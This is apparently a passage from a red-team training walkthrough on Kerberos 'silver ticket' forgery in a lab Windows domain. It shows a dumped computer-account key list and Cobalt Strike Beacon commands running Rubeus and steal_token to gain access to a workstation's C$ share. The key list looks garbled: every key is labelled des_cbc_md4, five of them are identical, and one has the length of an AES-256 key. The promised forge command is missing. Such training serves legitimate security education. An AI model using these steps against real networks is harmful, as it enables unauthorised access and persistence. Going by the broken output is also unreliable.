A "silver ticket" is a forged service ticket, signed using the secret material (RC4/AES keys) of a computer account. You may forge a TGS for any user to any service on that machine, which is useful for short/medium-term persistence. By default, computer passwords change every 30 days, at which time you must re-obtain the new secrets to continue making silver tickets. Both silver and golden (coming up next) tickets are forged, so can be generated on your own machine and imported into your Beacon session for use.
Let's say we dumped Kerberos keys from Workstation 1 from a SYSTEM Beacon.
Session : Service from 0
User Name : WKSTN-1$
Domain : DEV
Logon Server : (null)
Logon Time : 10/17/2023 10:31:24 AM
SID : S-1-5-20
* Username : wkstn-1$
* Domain : DEV.CYBERBOTIC.IO
* Password : (null)
* Key List :
des_cbc_md4 3ad3ca5c512dd138e3917b0848ed09399c4bbe19e83efe661649aa3adf2cb98f
des_cbc_md4 5192c07ee06e9264f0a7d7af5e645448
des_cbc_md4 5192c07ee06e9264f0a7d7af5e645448
des_cbc_md4 5192c07ee06e9264f0a7d7af5e645448
des_cbc_md4 5192c07ee06e9264f0a7d7af5e645448
des_cbc_md4 5192c07ee06e9264f0a7d7af5e645448
On your Windows attacking machine, use Rubeus to forge a service ticket for nlamb and the CIFS service.
beacon> getuid
[*] You are DEV\bfarmer (admin)
beacon> ls \\wkstn-1.dev.cyberbotic.io\c$
[-] could not open \\wkstn-1.dev.cyberbotic.io\c$\*: 5 - ERROR_ACCESS_DENIED
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFXD[...]MuaW8=
[*] Using DEV\nlamb:FakePass
[*] Showing process : False
[*] Username : nlamb
[*] Domain : DEV
[*] Password : FakePass
[+] Process : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 5668
[+] Ticket successfully imported!
[+] LUID : 0x423091
beacon> steal_token 5668
[+] Impersonated DEV\bfarmer
beacon> ls \\wkstn-1.dev.cyberbotic.io\c$
[*] Listing: \\wkstn-1.dev.cyberbotic.io\c$\
Size Type Last Modified Name
---- ---- ------------- ----
dir 08/16/2022 08:17:30 $Recycle.Bin
dir 08/15/2022 22:22:31 $WinREAgent
dir 01/27/2022 18:18:49 Documents and Settings
dir 12/07/2019 09:14:52 PerfLogs
dir 08/22/2022 00:15:03 Program Files
dir 10/06/2021 13:57:25 Program Files (x86)
dir 09/08/2022 13:58:46 ProgramData
dir 08/17/2022 17:52:54 Recovery
dir 09/06/2022 08:17:28 System Volume Information
dir 08/16/2022 08:15:58 Users
dir 09/09/2022 10:38:50 Windows
8kb fil 09/09/2022 08:37:00 DumpStack.log.tmp
796mb fil 09/09/2022 08:37:00 hiberfil.sys
704mb fil 09/09/2022 08:37:00 pagefile.sys
16mb fil 09/09/2022 08:37:00 swapfile.sys